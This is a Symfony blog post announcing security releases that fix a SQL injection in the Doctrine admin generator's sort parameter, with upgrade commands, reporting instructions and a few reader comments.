SymfonyWorld Online 2021 Winter Edition December 9 – 10, 2021 100% Online +20 talks and workshops

Security Release: 1.2.12, 1.3.3 and 1.4.3

A SQL injection vulnerability in the Doctrine admin generator was reported earlier today which has been addressed in these 1.2.12, 1.3.3 and 1.4.3 security releases. This vulnerability was limited to the Doctrine admin generator and did not affect the Propel admin generator or any other aspect of symfony's Doctrine integration.

We recommend all projects that use the Doctrine admin generator upgrade to these latest versions immediately.

The vulnerability

The admin generator in sfDoctrinePlugin was not properly filtering the GET request parameter that switches the sort order on record listing pages. By manipulating this parameter in the URL, it was possible to inject arbitrary SQL into the query that populates the list page. We have closed this hole by applying a simple whitelist filter which checks that this parameter is either "asc" or "desc," case-insensitive.

How to report a security issue

It behooves us all to review the process for reporting a security issue to the symfony core team. This process, described on the symfony wiki, is set aside from reporting other issues with the symfony code because security issues require special consideration. If you find a security vulnerability, please do not post to the symfony-users mailing list. Instead, send an email to security [at] symfony-project [dot] com describing the vulnerability and it will quickly be qualified and addressed. Once a fix is released, the vulnerability and fix will be announced on this blog.

How to upgrade

If you've checked out a copy of the a tag from Subversion, switch to the latest.

// symfony 1.2
$ svn switch

// symfony 1.3
$ svn switch

// symfony 1.4
$ svn switch

If you are using the pear package then do this works for you.

// symfony 1.2
$ pear upgrade symfony/symfony-1.2.12

// symfony 1.3
$ pear upgrade symfony/symfony-1.3.3

// symfony 1.4
$ pear upgrade symfony/symfony-1.4.3

Once that's complete, clear your project's cache.

$ php symfony cache:clear

If you'd prefer to download the security fix as a patch, you may do so for the 1.2, 1.3 or 1.4 branches.

Manage your notification preferences to receive an email as soon as a Symfony security release is published.
If you have found a security issue in Symfony, please send the details to security [at] and don't disclose it publicly until we can provide a fix for it.
Help the Symfony project!

As with any Open-Source project, contributing code or documentation is the most common way to help, but we also have a wide range of sponsoring opportunities.


Please update page, since it's still referring to 1.4.2 as latest release
Download 1.4.3 from
I've updated the post with more detail on the vulnerability itself and our fix.
I think you should put the name of the person discovering the security hole in the blog entry.
As a curtesy to the reporter.

You are right, but - roko didn't disclose real name. So? Who is roko?

I hijacked Kris post and added some Information for symfony 1.2
While 1.2.11 is not supported anymore, we of course fixed this issue also in 1.2.12

Comments are closed.

To ensure that comments stay relevant, they are closed for old posts.